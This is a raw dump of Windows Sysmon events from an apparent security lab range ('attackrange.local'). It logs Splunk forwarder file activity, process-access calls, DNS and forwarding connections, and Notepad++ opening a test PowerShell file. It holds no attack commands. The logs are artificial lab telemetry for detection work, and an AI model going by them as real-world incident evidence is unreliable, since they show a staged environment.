AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18093B3776608C44FA68722E9FA2914C,SHA256=C8FBE90BADBC3D3BF6F1BC99054BAFC88534DBCDECBA85D796687B215518129A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:08.786{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=853B149B6071C630562ACFB17F474C6D,SHA256=C4DF876C7B1A968E4A8A999EFA7AB31915204D5A6519E12E780FB06DBF77DB4B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.738{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x80000000000000001052555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.691{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.691{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.691{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.690{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.686{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.685{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F700-60EB-B57D-00000000CF01}948C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:09.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7BE60935CC70D7F24F09A06DBC89D1D,SHA256=6AC7909FCAE2FACAEE3D57204527E96B7C660F8EEE5F3F2D5B768F40A314A036,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:09.802{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=646A56777BC94B5241F06E10F880EFF7,SHA256=BA2FBE64267ED4224B0D0F1F008BB46B65AC57D8BAC0603FB7B4879E3885FDDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:09.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E0F0DF434F92EDD948C6CCCBD25490C,SHA256=2EA21B565360021B887C5C6BD79785101D90C297E38C827554DD82DA9FF2C01D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:09.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65F28B8BF0C1567D79AB2EABFB9BD51E,SHA256=2E149DA1FAE2728A3F5A0AD794CC0B6A2BA33DEB45BDB4752C95A656BBC5B453,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:10.953{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5451D10A79051DF0EF83382D9CB9F5CD,SHA256=A795D0128DE48CCEFAC5F8BC19E30DA1D28598F35E1FF5E8425E361BCDBF8520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:10.833{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EA7DFAD07B6BC5EC7FCADDA485A1C47,SHA256=4C0F7043D1C79DA38712CD6071D5D9A84CA7986F1C7104646C7767F115C43DC5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:09.247{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57391-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CDA6C16DC36516ACB74ADEA8C613DEB,SHA256=F5E62AE3A9F88538D4A828FEF0FA647AA9EA2C586FE5EC25BF1818E3E130D1D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:11.849{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD4FFAB2B51A426222E33F2A8F6201C,SHA256=EA6DCE5458A3785BB5565DBE46B7B23BBA62D4E20F0C6CB531DDDC1648637F50,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.936{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F703-60EB-B67D-00000000CF01}8748C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.936{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F703-60EB-B67D-00000000CF01}8748C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001052563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:11.935{466BC892-F703-60EB-B67D-00000000CF01}8748C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\test\sd2.ps1"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 354300x80000000000000001052562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:02.717{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51168-false10.0.1.12-8000- 23542300x80000000000000001052574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:12.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF52CB690B6A8E636E53FE500E496B58,SHA256=37F9EF1FC0C511AAD04DFC2A4F7393B40FC9ED1390EAF4BA0F5AF2C1E6A01302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:12.880{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B43F9BABCE5B9421ABE06FCABCBCE28,SHA256=3736AABB39F5B647D32A63F45589641B87BACE4C61E83C695C4DF1655C95A2B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:12.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E0F0DF434F92EDD948C6CCCBD25490C,SHA256=2EA21B565360021B887C5C6BD79785101D90C297E38C827554DD82DA9FF2C01D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:12.084{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:12.084{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:13.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE7051562B41A0AD3D6332767100AD7,SHA256=0E26D74B680F90BCBD6097628A993D416E68774FCB320D3F9C1BC630080B0626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:13.880{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D61C01139AD2F7BC2B8257F2920E12C2,SHA256=E7B8D22B37E14ED4B8025B43F17FA678B248AC57FF6ABB64A508D67C75DF9423,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:14.896{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DA6803D6B4CF4B4F49C4F3AA3772AD3,SHA256=5B16647E9849A72D783B31541E21A633B0BEAC964B3E1F966F9616A7B3A79BDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:14.970{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9910C233E55C7BDB91BAE9247CC14DD0,SHA256=19BD9D6F8E30877902C393478A0833615F800D2FD62AA0BBAF51E16C23B72000,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:14.580{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001052578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.090{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local54419- 354300x80000000000000001052577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.089{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59385- 354300x80000000000000001052576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:06.088{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55786- 23542300x80000000000000001052582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:15.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD324D6ECC02BE4770E4DFA6B147BB3A,SHA256=608E4D976FE9974A1C67D3ABABBA86485397D4EE732AA1ECF0A14376BEDC423B,IMPHASH=00000000000000000000000000000000falsetrue 